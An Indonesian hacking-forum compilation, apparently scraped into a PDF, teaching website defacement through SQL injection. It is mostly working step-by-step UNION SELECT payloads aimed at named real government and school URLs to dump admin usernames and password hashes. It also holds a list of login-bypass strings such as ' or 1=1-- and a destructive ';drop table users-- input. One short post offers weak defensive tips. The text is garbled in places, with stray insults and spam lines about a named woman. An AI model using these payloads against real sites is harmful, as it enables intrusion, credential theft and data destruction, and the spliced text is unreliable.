Hack Deface Kompolnas Polisi Bagian 7

  • Uploaded by: sawasaqa
  • 0
  • 0
  • May 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Hack Deface Kompolnas Polisi Bagian 7 as PDF for free.

More details

  • Words: 2,254
  • Pages: 11
Hack Deface website bagaimana cara mendeface website ? kebetulan banget ne,aku juga lagi pengen bisa belajar sql injection,mas DOS bagi bagi ilmunya dong. Nie aku ada dikit dasr buat di baca baca ,sekalian aku mau minta saran dari sang master deface di hc ini. 1.Cari target ex http://www.kompolnas.go.id/shop.php?id=96 2.cari tau ada bugs or ga cara : tambahin ' di akhir uid http://www.kompolnas.go.id/shop.php?id=96' kalo ada pesan erornya,berarti tuh ada bugsnya,n siap kita oprek. 3.hitung field di databasenya cara : tambahin +order+by+nominal/* contoh :http://www.kompolnas.go.id/shop.php?id=96+order+by+14/* keterangan Dasar guoooooblok orang islam gua aja minoritas mampu membuat website kompolnas.go.id!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1 disini kita main tebak tebakan.Kira2 ada berapa field di databesnya.Kita isi aja nominalnya dari 1 sampai ada pesan erornya.pada contoh di atas jumlah koolomnya ada 14,berarti pada nominal ke 14 pesan erornya tidak ada,and pada nominal 15 ada pesan erornya. 4.Sekarangh kita cari magic numbernya cara : abis uid kita tambah +union+select+nominal jumlah kolom contoh http://www.kompolnas.go.id/shop.php?id=989%20union%20select%201,2,3,4,5,6,7,8,9,1 0,11,12,13,14/*

Cantikanya aminah pekerja rumah sakit tangerang liat angka berapa yg nongol.dalam contoh ini yg kluar angka 6 5.sekarang kita liat versinya {ada yg bilang klo bagian ini ga penting banget} cara : maggic number yg kluar tadi kita ganti dengan concat_ws(user(),0x3a,database(),0x3a,version()).pada contoh diatas adalah angka 6

contoh http://www.kompolnas.go.id/shop.php?id=989 union select1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/* 6.keluarin tablenya cara kita tambahkan +from+information_schema.tables/* setelah angka terakhir contoh http://www.kompolnas.go.id/shop.php?id=989%20union%20select%201,2, 3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables ups ga isa...akalin ah.gimana kalo ditambahin lagi menjadi http://www.kompolnas.go.id/shop.php?id=989%20union%20select%201,2, 3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+whe re+table_schema=database()+limit+0,1/*/* gunanya apa itu sie???? hehehe aku juga ga ngerti,pas aku nyoba n gagal aku konsul ma temen,n kata dia suruh nambah itu di belakanganya,walhasil bisa kalian liat. 7.saatnya cari kolom cara sama kaya cara diatas,cuman tabel ganti sama column aja 8.cari user name n pass nya nah buat yg satu ini aku belom pamah bener jadi ga berani aku tulis,soalnya aku juga masih mumet,pernah nyoba,pernah sukses,pernah gagal. cuman buat kasus yg ini,contoh ini aku udah tau kelanjutanya,soalnya di bantu temen pas bagian ininya. akhir dari cerita ini{cieeee} akan berujung di http://www.kompolnas.go.id/shop.php?id=989+union+select+1,2,3,4,5, concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_eq/* buat master2 deface hc,mohon cara yg aku pake ini di sempurnakan dong,aku banyak yang salah tuh.nyatanya dari 4 target yg aku coba,tiap target ga bisa di selesaikan dengan satu cara. Mksdnya,dalam cari bugs,cari table,cari magic number,aku selalu pake cara yg beda.Aku dapet berbagai cara dalam deface web,bukanya bikin aku jadi tambah mudeng,malah ajdi tambah pusing aku,pusing milih,mana sie tutor yg bener,masa caranya beda beda.?????? buat yg ikut jalan ku,nyoba cara yg ini,n sukses,post ya,bagi yg gagal juga post,gagalnya dimana,biar mas DOS yg nanganin.Wkwkwkwkwkwk kan beliau yang lebih ahli....Pisss mas DOS....

_________________ Rasa ingin tau adalah motivasi yang sangat bagus. Back to top Display posts from previous: All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First All times are GMT + 7 Hours Seksinya aminah pekerja rumah sakit tangerang Tips Sederhana Mengantisipasi XSS dan SQL Inject Pada PHP (Database MySQL) buat yang belum tau XSS dan sql injek silakan cari d google,jangan malas.. hadu.. banyak bertebaran d luar sana tekhnik2 hacking XSS maupun Sql injek,trus antisipasina gmn donk? gue cuma share sederhana doank, tapi……. disini saya memperkecil keadaan saja ,selanjutnya explorasikan dengan search engine lainnya.. 1. Gunakan wrapper untuk eksekusi sql (file disertakan) 2. Gunakan validasi POST dan GET variable sebelum dieksekusi dengan SQL command 3. Replace POST dan GET variable yang berisi karakter-karakter yang bisa mengacaukan SQL (database) sebelum dieksekusi dengan SQL command. contoh kita punya tabel: CREATE TABLE gbook ( id int(11) NOT NULL auto_increment, name varchar(15) default NULL, komen varchar(text), PRIMARY KEY (id) ) TYPE=MyISAM; Untuk view content dgn id = 3, biasanya kita tulis pada browser seperti berikut ini. http://blablablablala.com/index.php?action=view&id=3 Untuk memahami nya, mari kita pilah2 dulu url tadi. – action=view, adalah variabel $_GET dengan key = action dan value = view yang akan mengeksekusi fungsi viewContent() – id =1, adalah variabel $_GET dengan key = id dan value = 1 yang akan dieksekusi dalam SQL command.

OK, sekarang penulis akan berikan file-file untuk mencoba kasus di atas, ada tiga file yaitu seperti yang terlihat di bawah ini. - config.php, merupakan file yang berisi konfigurasi database yang bisa Anda set sesuai pada komputer kamu. - classdb.php, merupakan file yang berisi operasi terhadap database (MySQL) index.php, merupakan file utama yang akan dijalankan nantinya. now.. kita coba dengan ini http://index.php?action=view&id=’1 eng ing keluarnya adalah = Bad Request Jadi kesimpulannya SQL injection dan XSS bisa diantisipasi hanya dengan ketelitian dalam programming. Itu aja sih kayaknya credit by kemangi.. . . +rep plzz. . . .hehehe -------------------------------------------------------------------------------7371756174746572372070616C696E672067616E74656E67 9 Feb 2009 12:44 d4Ld0L Letkol

Posts: 2.718 Joined: Sep 2008 Reputation: 52 Thanks 13 x di 12 post Post: #2RE: Tips Sederhana Mengantisipasi XSS dan SQL Inject Pada PHP (Database MySQL) kayknya lebih seru pake sql injection .. 9 Feb 2009 12:49

squatter7 Mayor

Posts: 1.727 Joined: Dec 2008 Reputation: 41 Thanks 38 x di 36 post Post: #3SQL injection (basic) neh cuma sdkit pengetahuan dasar SQL injection buat pemula seperti SAYA. . .jadi maap klo ada yg salah. . .maklum gag isa apa" jd buat para master" mohon tambahan nya ada beberapa tahap yg harus di lakukan untuk melakukan serangan SQL inejction berikut adalah cara-caranya : - pertama mencari site yg vuln terhadap sql inecjtion tentunya. bagaimana kita tahu site tersebut vuln ?? site yg vuln bisa di coba/test dengan cara menambahkan tanda petik tunggal (') pada akhir URL site yg kita coba serang. sebagai contoh saya menggunakan site http://www.sman2bdg.or.id sebagai target - langkah kedua adalah pengetesan apakah site tersebut vuln sql injection atau tidak dengan cara menambahkan single quote (') pada akhir URL. target kita adalah sman2bdg.or.id, carilah url di situs tersebut yg vuln akan sql injection seperti contoh berikut http://www.kompolnas.go.idindex.php?x=06&id=225 lalu tambahkan single quote di belakang url hinga di dapat URL seperti ini http://www.kompolnas.go.idindex.php?x=06&id=225' lihat dengan teliti apa yg terjadi dengan situs itu ?? ya error terjadi pada situs itu seperti pada gambar di bawah ini itu menandakan situs tersebut vuln terhadap sql injection, cheers . - langkah selanjutnya adalah memeriksa jumlah kolom yg ada. untuk mencari jumlah kolom yg ada di gunakan syntax "order by" orderlah sampai kondisi false (error seperti diatas) tercapai dimulai dari order by 1 http://www.kompolnas.go.idindex.php?x=06&id=225 order by 1-- jika belum terjadi error pada order by 1-- maka lanjutkan dengan order by 2-- dan selanjutnya sampai error terjadi lagi dalam contoh ini error terjadi pada order by 11--. - langkah ke 4 adalah mencari hole pada jumlah kolom yg terdapat di situs tersebut dengan syntax "union select". lakukan union select dengan jumlah kolom adalah 10 kenapa 10 ?? karena setelah kita lakukan order pada langkah sebelumnya terdapat error pada kolom 11 maka lakukan union pada kolom 10 (tidak ada error) http://www.kompolnas.go.idindex.php?x=06&id=-225 union select 1,2,3,4,5,6,7,8,9,10--. setelah di union tadi maka akan muncul angka-angka yg mana pada angka tersebut kita bisa masukan perintah untuk mencari tau versi dari my sql yg di gunakan. pada gambar di atas terlihat angka 2,3, dan 5.

- langkah selanjutnya adalah mencari tau versi mysql yg di gunakan. untuk mencari tau versi yg di gunakan syntaxnya adalah vesion() masukan syntax untuk mencari version ke adalam angka yg tadi saat error muncul seperti berikut http://www.kompolnas.go.idindex.php?x=06&id=-225 union select 1,version(),3,4,5,6,7,8,9,10-- sampai langkah ini kita sudah mengetahui versi mysql yg di gunakan situs tersebut dalam hal ini versi 5 beruntung lah kita karena versi 5 lebih mudah pengerjaanya di banding versi 4 atau 3 - sekarang kita akan mencari tau nama nama tabel yg tersedia dengan menggunakan syntax table_name from information_schema.tables-- masukan syntax tersebut di angka ajaib seperti ini http://www.kompolnas.go.idindex.php?x=06&id=-225 union select 1,table_name,3,4,5,6,7,8,9,10 from information_schema.tables-- maka akan muncul nama nama table yg exist di situs tersebut. carilah nama table yg bisa memberikan kita previladge untuk mengedit isi situs (jika berminat ) misal admin,user, atau login, etc. - jika sudah tau nama table yg berguna maka tahap kita hanya tinggal beberapa langkah lagi dan selanjutnya adalah mencari tau nama kolom yg ada dari table yg memberikan hak akses tadi (admin atau user) dengan menggunakan perintah column_name from information_schema.columns where table_name=(hexadecimal dari nama table admin)-dalam hal ini saya mengambil table ADMIN. http://www.kompolnas.go.idindex.php?x=06&id=-225 union select 1,column_name,3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x41444d494e--. hohoho muncul lah nama nama table yg kita cari =P~ mantapppp - langkah terakhir adalah mencari nilai nilai dari kolom yg tersedia pada table admin lakukan dengan concat spoiler http://www.kompolnas.go.idindex.php?x=06&id=225%20union%20select%201,concat(ID_USER,0x3a,NAMA,0x3a,TANGGAL,0x3a,PA SSWORD,0x3a,EMAIL), 3,4,5,6,7,8,9,10%20from%20ADMIN-- 0x3a adalah nilai hexadecimal dari semicolon (. horeee password sama usernamenya keluar tapi kita masih harus medecrypt password yg berbentuk hash md5 untuk mendecryptnya bisa di gunakan cain and able ataupun crack online yg bisa di cari di google ini hanya sebagai pembelajaran segala resiko ada di tangan anda yg memperaktekan credit by r3dwood seperti biasa + rep -------------------------------------------------------------------------------Re: Deface Website

by opelgaring on Thu Jan 29, 2009 5:32 am Gi bahas deface apa sql injection? Bagi ilmu orang ahhhhhh..... Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query' dengan cara manipulasi data input ke applikasi tsb. Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql , disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan beberapa sql injection pada url. Biasa Sql Injection dilakukan pada login page pada asp seperti di : admin\login.asp login.asp Jadi yang akan menjadi target itu page tersebut , sekarang kita mulai aja dengan dasar-dasar sql injection :d. Biasanya di sql statment select id, user_name, password from user maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user. Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut : select id, user_name,password from user where name = 'echo' and password='password' Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language" seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL. Nah, ga tau kenapa karakter single quote 'breaks out' dari delimiter nya SQL Jadi kalau misal ada inputan User: echo';drop table user-dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute. Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti input login + password. Nama field nya 'login' dan 'pass'. dan SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'"; coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative) pasti ke drop tuh table users Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas kita langsung praktek aja> Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau admin\login.asp. Kalau udah dapet masukin nich variable sql nya user:admin pass:' or 1=1--

Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d atau : user:' or 1=1-admin:' or 1=1-Mas , ga bisa nich gimana ya ? Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya : Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya : http://vivtim/index.asp?id=10 Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan pada addressnya seperti memasukan : test'1=1-menjadi http://victim/index.asp?id=test'1=1-Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username. ingat script ini ditamhakna pd script yg sudah kalian download dr target . Variable ' or 1=1-Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh pada sebuah web tertulis http://victim/index.asp?category=laptop Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb . Kalau ditulis dalam script ASP maka akan menjadi : v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.execute(sqlstr) Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi SELECT * FROM product WHERE PCategory='laptop' lalu apa hub dengan 'or 1=1--coba kalau kita ganti http://victim/index.asp?category=laptop menjadi http://victim/index.asp?category=laptop'or 1=1-Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi SELECT * FROM product WHERE PCategory='laptop' or 1=1--'

artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page Kita bisa masuk kedalam login page tanpa password dan user name :d. Kemungkinan-kemungkinan variable lainya : or 1=1-" or 1=1-or 1=1-' or 'a'='a " or "a"="a ') or ('a'='a ' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-" or 1=1-or 1=1-' or a=a-" or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -hi' or 1=1 -hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna . ---------------------------------------------------------------------------------------------------------------------Sumber Baca : http://securityfocus.com/articles/SQLin ... torial.php http://www.securiteam.com/securityreviewskalo ada kekurangan, itu semata-mata dari saya

kalo ada kebenaran, itu semata-mata dari PENGUASA ILMU

Related Documents


More Documents from "haraqawa"